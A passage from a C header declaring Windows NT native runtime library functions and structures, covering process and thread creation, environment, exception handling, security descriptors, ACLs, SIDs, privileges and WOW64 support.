String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInt64ToUnicodeString(\n _In_ ULONGLONG Value,\n _In_opt_ ULONG Base,\n _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeStringToInteger(\n _In_ PUNICODE_STRING String,\n _In_opt_ ULONG Base,\n _Out_ PULONG Value);\n\n/************************************************************************************\n*\n* RTL Process/Thread API.\n*\n************************************************************************************/\n\ntypedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(\n PRTL_USER_PROCESS_PARAMETERS ProcessParameters\n );\n\ntypedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(\n PVOID ThreadParameter\n );\n\ntypedef struct _RTL_USER_PROCESS_INFORMATION {\n ULONG Length;\n HANDLE Process;\n HANDLE Thread;\n CLIENT_ID ClientId;\n SECTION_IMAGE_INFORMATION ImageInformation;\n} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;\n\n//\n// This structure is used only by Wow64 processes. The offsets\n// of structure elements should the same as viewed by a native Win64 application.\n//\ntypedef struct _RTL_USER_PROCESS_INFORMATION64 {\n ULONG Length;\n LONGLONG Process;\n LONGLONG Thread;\n CLIENT_ID64 ClientId;\n SECTION_IMAGE_INFORMATION64 ImageInformation;\n} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64;\n\nNTSYSAPI\nNTSTATUS\nSTDAPIVCALLTYPE\nRtlSetProcessIsCritical(\n _In_ BOOLEAN NewValue,\n _Out_opt_ PBOOLEAN OldValue,\n _In_ BOOLEAN CheckFlag);\n\nNTSYSAPI\nNTSTATUS\nSTDAPIVCALLTYPE\nRtlSetThreadIsCritical(\n _In_ BOOLEAN NewValue,\n _Out_opt_ PBOOLEAN OldValue,\n _In_ BOOLEAN CheckFlag);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateEnvironment(\n _In_ BOOLEAN CloneCurrentEnvironment,\n _Out_ PVOID *Environment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateEnvironmentEx(\n _In_ PVOID SourceEnv,\n _Out_ PVOID *Environment,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlExpandEnvironmentStrings(\n _In_opt_ PVOID Environment,\n _In_reads_(SrcLength) PWSTR Src,\n _In_ SIZE_T SrcLength,\n _Out_writes_opt_(DstLength) PWSTR Dst,\n _In_ SIZE_T DstLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlExpandEnvironmentStrings_U(\n _In_opt_ PVOID Environment,\n _In_ PCUNICODE_STRING Source,\n _Out_ PUNICODE_STRING Destination,\n _Out_opt_ PULONG ReturnedLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetCurrentEnvironment(\n _In_ PVOID Environment,\n _Out_opt_ PVOID *PreviousEnvironment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryEnvironmentVariable_U(\n _In_opt_ PVOID Environment,\n _In_ PUNICODE_STRING Name,\n _Out_ PUNICODE_STRING Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetEnvironmentVariable(\n _Inout_opt_ PVOID* Environment,\n _In_ PUNICODE_STRING Name,\n _In_opt_ PUNICODE_STRING Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDestroyEnvironment(\n _In_ PVOID Environment);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateProcessParameters(\n _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,\n _In_ PUNICODE_STRING ImagePathName,\n _In_opt_ PUNICODE_STRING DllPath,\n _In_opt_ PUNICODE_STRING CurrentDirectory,\n _In_opt_ PUNICODE_STRING CommandLine,\n _In_opt_ PVOID Environment,\n _In_opt_ PUNICODE_STRING WindowTitle,\n _In_opt_ PUNICODE_STRING DesktopInfo,\n _In_opt_ PUNICODE_STRING ShellInfo,\n _In_opt_ PUNICODE_STRING RuntimeData);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDestroyProcessParameters(\n _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateProcessParametersEx(\n _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,\n _In_ PUNICODE_STRING ImagePathName,\n _In_opt_ PUNICODE_STRING DllPath,\n _In_opt_ PUNICODE_STRING CurrentDirectory,\n _In_opt_ PUNICODE_STRING CommandLine,\n _In_opt_ PVOID Environment,\n _In_opt_ PUNICODE_STRING WindowTitle,\n _In_opt_ PUNICODE_STRING DesktopInfo,\n _In_opt_ PUNICODE_STRING ShellInfo,\n _In_opt_ PUNICODE_STRING RuntimeData,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateUserProcess(\n _In_ PUNICODE_STRING NtImagePathName,\n _In_ ULONG Attributes,\n _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters,\n _In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,\n _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,\n _In_opt_ HANDLE ParentProcess,\n _In_ BOOLEAN InheritHandles,\n _In_opt_ HANDLE DebugPort,\n _In_opt_ HANDLE ExceptionPort,\n _Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformationn);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateUserThread(\n _In_ HANDLE Process,\n _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,\n _In_ BOOLEAN CreateSuspended,\n _In_ ULONG StackZeroBits,\n _In_opt_ SIZE_T MaximumStackSize,\n _In_opt_ SIZE_T InitialStackSize,\n _In_ PUSER_THREAD_START_ROUTINE StartAddress,\n _In_opt_ PVOID Parameter,\n _Out_opt_ PHANDLE Thread,\n _Out_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlExitUserThread(\n _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlExitUserProcess(\n _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeUserThreadStack(\n _In_ HANDLE hProcess,\n _In_ HANDLE hThread);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlPushFrame(\n _In_ PTEB_ACTIVE_FRAME Frame);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlPopFrame(\n _In_ PTEB_ACTIVE_FRAME Frame);\n\nNTSYSAPI\nPTEB_ACTIVE_FRAME\nNTAPI\nRtlGetFrame(\n VOID);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEncodePointer(\n _In_ PVOID Ptr);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlDecodePointer(\n _In_ PVOID Ptr);\n\n/************************************************************************************\n*\n* RTL Memory Buffer API.\n*\n************************************************************************************/\n\nNTSYSAPI\nSIZE_T\nNTAPI\nRtlCompareMemoryUlong(\n _In_ PVOID Source,\n _In_ SIZE_T Length,\n _In_ ULONG Pattern);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFillMemoryUlong(\n _Out_ PVOID Destination,\n _In_ SIZE_T Length,\n _In_ ULONG Pattern);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFillMemoryUlonglong(\n _Out_ PVOID Destination,\n _In_ SIZE_T Length,\n _In_ ULONGLONG Pattern);\n\n/************************************************************************************\n*\n* RTL PEB API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPPEB\nNTAPI\nRtlGetCurrentPeb(\n VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquirePebLock(\n VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleasePebLock(\n VOID);\n\n/************************************************************************************\n*\n* RTL Exception Handling API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddVectoredExceptionHandler(\n _In_ ULONG First,\n _In_ PVECTORED_EXCEPTION_HANDLER Handler);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRemoveVectoredExceptionHandler(\n _In_ PVOID Handle);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDispatchException(\n _In_ PEXCEPTION_RECORD ExceptionRecord,\n _In_ PCONTEXT ContextRecord);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddVectoredContinueHandler(\n _In_ ULONG First,\n _In_ PVECTORED_EXCEPTION_HANDLER Handler);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRemoveVectoredContinueHandler(\n _In_ PVOID Handle);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRaiseException(\n _In_ PEXCEPTION_RECORD ExceptionRecord);\n\nNTSYSAPI\nDECLSPEC_NORETURN\nVOID\nNTAPI\nRtlRaiseStatus(\n _In_ NTSTATUS Status);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtContinue(\n _In_ PCONTEXT ContextRecord,\n _In_ BOOLEAN TestAlert);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRaiseException(\n _In_ PEXCEPTION_RECORD ExceptionRecord,\n _In_ PCONTEXT ContextRecord,\n _In_ BOOLEAN FirstChance);\n\n__analysis_noreturn\nNTSYSAPI\nVOID\nNTAPI\nRtlAssert(\n _In_ PVOID VoidFailedAssertion,\n _In_ PVOID VoidFileName,\n _In_ ULONG LineNumber,\n _In_opt_ PSTR MutableMessage);\n\n#define RTL_ASSERT(exp) \\\n ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE)\n#define RTL_ASSERTMSG(msg, exp) \\\n ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE)\n#define RTL_SOFT_ASSERT(_exp) \\\n ((!(_exp)) ? (DbgPrint(\"%s(%d): Soft assertion failed\\n Expression: %s\\n\", __FILE__, __LINE__, #_exp), FALSE) : TRUE)\n#define RTL_SOFT_ASSERTMSG(_msg, _exp) \\\n ((!(_exp)) ? (DbgPrint(\"%s(%d): Soft assertion failed\\n Expression: %s\\n Message: %s\\n\", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE)\n\ntypedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)(\n _In_ PEXCEPTION_POINTERS ExceptionInfo\n );\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetUnhandledExceptionFilter(\n _In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlUnhandledExceptionFilter(\n _In_ PEXCEPTION_POINTERS ExceptionPointers);\n\n/************************************************************************************\n*\n* RTL Security API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetOwnerSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _Out_ PSID *Owner,\n _Out_ PBOOLEAN OwnerDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetGroupSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _Out_ PSID *Group,\n _Out_ PBOOLEAN GroupDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ ULONG Revision);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetOwnerSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ PSID Owner,\n _In_ BOOLEAN OwnerDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,\n _Out_ PSECURITY_DESCRIPTOR* OutputSecurityDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlMakeSelfRelativeSD(\n _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n _Out_writes_bytes_(*BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n _Inout_ PULONG BufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAbsoluteToSelfRelativeSD(\n _In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n _Out_writes_bytes_to_opt_(*BufferLength, *BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n _Inout_ PULONG BufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSelfRelativeToAbsoluteSD(\n _In_ PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,\n _Out_writes_bytes_to_opt_(*AbsoluteSecurityDescriptorSize, *AbsoluteSecurityDescriptorSize) PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,\n _Inout_ PULONG AbsoluteSecurityDescriptorSize,\n _Out_writes_bytes_to_opt_(*DaclSize, *DaclSize) PACL Dacl,\n _Inout_ PULONG DaclSize,\n _Out_writes_bytes_to_opt_(*SaclSize, *SaclSize) PACL Sacl,\n _Inout_ PULONG SaclSize,\n _Out_writes_bytes_to_opt_(*OwnerSize, *OwnerSize) PSID Owner,\n _Inout_ PULONG OwnerSize,\n _Out_writes_bytes_to_opt_(*PrimaryGroupSize, *PrimaryGroupSize) PSID PrimaryGroup,\n _Inout_ PULONG PrimaryGroupSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetDaclSecurityDescriptor(\n _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ BOOLEAN DaclPresent,\n _In_opt_ PACL Dacl,\n _In_ BOOLEAN DaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetDaclSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _Out_ PBOOLEAN DaclPresent,\n _Out_ PACL* Dacl,\n _Out_ PBOOLEAN DaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetSaclSecurityDescriptor(\n _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ BOOLEAN SaclPresent,\n _In_opt_ PACL Sacl,\n _In_ BOOLEAN SaclDefaulted);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetSaclSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _Out_ PBOOLEAN SaclPresent,\n _Out_ PACL* Sacl,\n _Out_ PBOOLEAN SaclDefaulted);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\n_Check_return_\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidSecurityDescriptor(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\n_Check_return_\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidRelativeSecurityDescriptor(\n _In_reads_bytes_(SecurityDescriptorLength) PSECURITY_DESCRIPTOR SecurityDescriptorInput,\n _In_ ULONG SecurityDescriptorLength,\n _In_ SECURITY_INFORMATION RequiredInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateAcl(\n _Out_writes_bytes_(AclLength) PACL Acl,\n _In_ ULONG AclLength,\n _In_ ULONG AclRevision);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidAcl(\n _In_ PACL Acl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryInformationAcl(\n _In_ PACL Acl,\n _Out_writes_bytes_(AclInformationLength) PVOID AclInformation,\n _In_ ULONG AclInformationLength,\n _In_ ACL_INFORMATION_CLASS AclInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetInformationAcl(\n _Inout_ PACL Acl,\n _In_reads_bytes_(AclInformationLength) PVOID AclInformation,\n _In_ ULONG AclInformationLength,\n _In_ ACL_INFORMATION_CLASS AclInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG StartingAceIndex,\n _In_reads_bytes_(AceListLength) PVOID AceList,\n _In_ ULONG AceListLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDeleteAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceIndex);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetAce(\n _In_ PACL Acl,\n _In_ ULONG AceIndex,\n _Outptr_ PVOID *Ace);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlFirstFreeAce(\n _In_ PACL Acl,\n _Out_ PVOID *FirstFree);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlOwnerAcesPresent(\n _In_ PACL pAcl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedAceEx(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedAceEx(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid,\n _In_ BOOLEAN AuditSuccess,\n _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessAceEx(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID Sid,\n _In_ BOOLEAN AuditSuccess,\n _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessAllowedObjectAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_opt_ GUID *ObjectTypeGuid,\n _In_opt_ GUID *InheritedObjectTypeGuid,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAccessDeniedObjectAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_opt_ GUID *ObjectTypeGuid,\n _In_opt_ GUID *InheritedObjectTypeGuid,\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddAuditAccessObjectAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ ACCESS_MASK AccessMask,\n _In_opt_ GUID *ObjectTypeGuid,\n _In_opt_ GUID *InheritedObjectTypeGuid,\n _In_ PSID Sid,\n _In_ BOOLEAN AuditSuccess,\n _In_ BOOLEAN AuditFailure);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddCompoundAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ UCHAR AceType,\n _In_ ACCESS_MASK AccessMask,\n _In_ PSID ServerSid,\n _In_ PSID ClientSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddMandatoryAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ PSID Sid,\n _In_ UCHAR AceType,\n _In_ ACCESS_MASK AccessMask);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFindAceByType(\n _In_ PACL pAcl,\n _In_ UCHAR AceType,\n _Out_opt_ PULONG pIndex);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlOwnerAcesPresent(\n _In_ PACL pAcl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDefaultNpAcl(\n _Out_ PACL* Acl);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddProcessTrustLabelAce(\n _Inout_ PACL Acl,\n _In_ ULONG AceRevision,\n _In_ ULONG AceFlags,\n _In_ PSID ProcessTrustLabelSid,\n _In_ UCHAR AceType,\n _In_ ACCESS_MASK AccessMask);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlValidSid(\n _In_ PSID Sid);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualSid(\n _In_ PSID Sid1,\n _In_ PSID Sid2);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualPrefixSid(\n _In_ PSID Sid1,\n _In_ PSID Sid2);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthRequiredSid(\n _In_ ULONG SubAuthorityCount);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFreeSid(\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAllocateAndInitializeSid(\n _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n _In_ UCHAR SubAuthorityCount,\n _In_ ULONG SubAuthority0,\n _In_ ULONG SubAuthority1,\n _In_ ULONG SubAuthority2,\n _In_ ULONG SubAuthority3,\n _In_ ULONG SubAuthority4,\n _In_ ULONG SubAuthority5,\n _In_ ULONG SubAuthority6,\n _In_ ULONG SubAuthority7,\n _Out_ PSID *Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeSid(\n _Out_ PSID Sid,\n _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n _In_ UCHAR SubAuthorityCount);\n\nNTSYSAPI\nPSID_IDENTIFIER_AUTHORITY\nNTAPI\nRtlIdentifierAuthoritySid(\n _In_ PSID Sid);\n\nNTSYSAPI\nPULONG\nNTAPI\nRtlSubAuthoritySid(\n _In_ PSID Sid,\n _In_ ULONG SubAuthority);\n\nNTSYSAPI\nPUCHAR\nNTAPI\nRtlSubAuthorityCountSid(\n _In_ PSID Sid);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlLengthSid(\n _In_ PSID Sid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySid(\n _In_ ULONG DestinationSidLength,\n _In_ PSID DestinationSid,\n _In_ PSID SourceSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCopySidAndAttributesArray(\n _In_ ULONG ArrayLength,\n _In_ PSID_AND_ATTRIBUTES Source,\n _In_ ULONG TargetSidBufferSize,\n _Out_ PSID_AND_ATTRIBUTES TargetArrayElement,\n _Out_ PSID TargetSid,\n _Out_ PSID *NextTargetSid,\n _Out_ PULONG RemainingTargetSidBufferSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLengthSidAsUnicodeString(\n _In_ PSID Sid,\n _Out_ PULONG StringLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlConvertSidToUnicodeString(\n _In_ PUNICODE_STRING UnicodeString,\n _In_ PSID Sid,\n _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCreateServiceSid(\n _In_ PUNICODE_STRING ServiceName,\n _Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid,\n _Inout_ PULONG ServiceSidLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSidEqualLevel(\n _In_ PSID Sid1,\n _In_ PSID Sid2,\n _Out_ PBOOLEAN EqualLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSidIsHigherLevel(\n _In_ PSID Sid1,\n _In_ PSID Sid2,\n _Out_ PBOOLEAN HigherLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlReplaceSidInSd(\n _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ PSID OldSid,\n _In_ PSID NewSid,\n _Out_ ULONG* NumChanges);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsElevatedRid(\n _In_ PSID_AND_ATTRIBUTES SidAttr);\n\nFORCEINLINE \nLUID \nNTAPI \nRtlConvertLongToLuid(\n _In_ LONG Long\n)\n{\n LUID TempLuid;\n LARGE_INTEGER TempLi;\n\n TempLi.QuadPart = Long;\n TempLuid.LowPart = TempLi.LowPart;\n TempLuid.HighPart = TempLi.HighPart;\n return(TempLuid);\n}\n\nFORCEINLINE \nLUID \nRtlConvertUlongToLuid(\n _In_ ULONG Ulong\n)\n{\n LUID tempLuid;\n\n tempLuid.LowPart = Ulong;\n tempLuid.HighPart = 0;\n\n return tempLuid;\n}\n\nNTSYSAPI\nULONG\nNTAPI\nRtlUniform(\n _Inout_ PULONG Seed);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlRandomEx(\n _Inout_ PULONG Seed);\n\nNTSYSAPI\nULONG32\nNTAPI\nRtlComputeCrc32(\n _In_ ULONG32 PartialCrc,\n _In_ PVOID Buffer,\n _In_ ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAdjustPrivilege(\n _In_ ULONG Privilege,\n _In_ BOOLEAN Enable,\n _In_ BOOLEAN Client,\n _Out_ PBOOLEAN WasEnabled);\n\n#define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001\n#define RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAcquirePrivilege(\n _In_ PULONG Privilege,\n _In_ ULONG NumPriv,\n _In_ ULONG Flags,\n _Out_ PVOID* ReturnedState);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleasePrivilege(\n _In_ PVOID StatePointer);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlRemovePrivileges(\n _In_ HANDLE TokenHandle,\n _In_ PULONG PrivilegesToKeep,\n _In_ ULONG PrivilegeCount);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreAllAccessesGranted(\n _In_ ACCESS_MASK GrantedAccess,\n _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreAnyAccessesGranted(\n _In_ ACCESS_MASK GrantedAccess,\n _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlMapGenericMask(\n _In_ PACCESS_MASK AccessMask,\n _In_ PGENERIC_MAPPING GenericMapping);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImpersonateSelf(\n _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImpersonateSelfEx(\n _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,\n _In_opt_ ACCESS_MASK AdditionalAccess,\n _Out_opt_ PHANDLE ThreadToken);\n\n/************************************************************************************\n*\n* RTL Version API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetVersion(\n _Inout_\tPRTL_OSVERSIONINFOW lpVersionInformation);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlGetNtVersionNumbers(\n _Out_opt_ PULONG MajorVersion,\n _Out_opt_ PULONG MinorVersion,\n _Out_opt_ PULONG BuildNumber);\n\n/************************************************************************************\n*\n* RTL Error Status API.\n*\n************************************************************************************/\n\n_When_(Status < 0, _Out_range_(> , 0))\n_When_(Status >= 0, _Out_range_(== , 0))\nNTSYSAPI\nULONG\nNTAPI\nRtlNtStatusToDosError(\n _In_ NTSTATUS Status);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetLastWin32Error(\n _In_ LONG Win32Error);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetLastNtStatus(\n VOID);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlGetLastWin32Error(\n VOID);\n\n_When_(Status < 0, _Out_range_(> , 0))\n_When_(Status >= 0, _Out_range_(== , 0))\nNTSYSAPI\nULONG\nNTAPI\nRtlNtStatusToDosErrorNoTeb(\n _In_ NTSTATUS Status);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSetLastWin32ErrorAndNtStatusFromNtStatus(\n _In_ NTSTATUS Status);\n\n/************************************************************************************\n*\n* RTL WOW64 Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64EnableFsRedirection(\n _In_ BOOLEAN Wow64FsEnableRedirection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64EnableFsRedirectionEx(\n _In_ PVOID DisableFsRedirection,\n _Out_ PVOID *OldFsRedirectionLevel);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64GetThreadContext(\n _In_ HANDLE ThreadHandle,\n _Inout_ PWOW64_CONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlWow64SetThreadContext(\n _In_ HANDLE ThreadHandle,\n _In_ PWOW64_CONTEXT ThreadContext);\n\n/************************************************************************************\n*\n* RTL Heap Management API.\n*\n************************************************************************************/\n\ntypedef 